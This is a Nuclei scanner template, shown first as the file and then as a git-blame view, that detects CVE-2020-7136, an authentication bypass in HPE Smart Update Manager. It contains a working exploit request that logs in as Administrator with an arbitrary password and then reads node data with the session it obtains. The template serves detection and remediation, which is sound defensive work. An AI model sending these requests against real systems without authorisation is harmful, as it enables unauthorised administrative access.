nuclei-templates/cves/2020/CVE-2020-7136.yaml

id: CVE-2020-7136

info:
  name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
  author: gy741
  severity: critical
  description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
  reference:
    - https://www.tenable.com/security/research/tra-2020-02
    - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7136
    - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
  remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7136
    cwe-id: CWE-288
  tags: cve,cve2020,hp,auth-bypass,hpe

requests:
  - raw:
      - |
        POST /session/create HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}

      - |
        GET /session/{{sessionid}}/node/index HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "hmessage"
          - "Command completed successfully."
          - "node_name"
        condition: and

    extractors:
      - type: regex
        name: sessionid
        group: 1
        internal: true
        part: body
        regex:
          - '"sessionId":"([a-z0-9.]+)"'

# Enhanced by mp on 2022/04/29
Create CVE-2020-7136.yaml A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-11 06:39:41 +00:00			`id: CVE-2020-7136`

			`info:`
Dashboard Content Enhancements (#4268) Dashboard Content Enhancements 2022-04-29 19:58:07 +00:00			`name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access`
Create CVE-2020-7136.yaml A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-11 06:39:41 +00:00			`author: gy741`
			`severity: critical`
Dashboard Content Enhancements (#4268) Dashboard Content Enhancements 2022-04-29 19:58:07 +00:00			`description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.`
Create CVE-2020-7136.yaml A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-11 06:39:41 +00:00			`reference:`
			`- https://www.tenable.com/security/research/tra-2020-02`
			`- https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-7136`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us`
			`remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).`
Create CVE-2020-7136.yaml A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-11 06:39:41 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Create CVE-2020-7136.yaml A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-11 06:39:41 +00:00			`cve-id: CVE-2020-7136`
			`cwe-id: CWE-288`
Update CVE-2020-7136.yaml 2022-01-11 08:13:30 +00:00			`tags: cve,cve2020,hp,auth-bypass,hpe`
Create CVE-2020-7136.yaml A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-11 06:39:41 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /session/create HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Content-Type: application/json`

			`{"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}`

Update CVE-2020-7136.yaml 2022-01-11 08:13:30 +00:00			`- \|`
			`GET /session/{{sessionid}}/node/index HTTP/1.1`
			`Host: {{Hostname}}`

Create CVE-2020-7136.yaml A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-11 06:39:41 +00:00			`matchers:`
Update CVE-2020-7136.yaml 2022-01-11 08:13:30 +00:00			`- type: word`
			`part: body`
			`words:`
			`- "hmessage"`
			`- "Command completed successfully."`
			`- "node_name"`
			`condition: and`

			`extractors:`
Create CVE-2020-7136.yaml A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-11 06:39:41 +00:00			`- type: regex`
Update CVE-2020-7136.yaml 2022-01-11 08:13:30 +00:00			`name: sessionid`
			`group: 1`
			`internal: true`
Create CVE-2020-7136.yaml A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-11 06:39:41 +00:00			`part: body`
			`regex:`
			`- '"sessionId":"([a-z0-9.]+)"'`
Dashboard Content Enhancements (#4268) Dashboard Content Enhancements 2022-04-29 19:58:07 +00:00
			`# Enhanced by mp on 2022/04/29`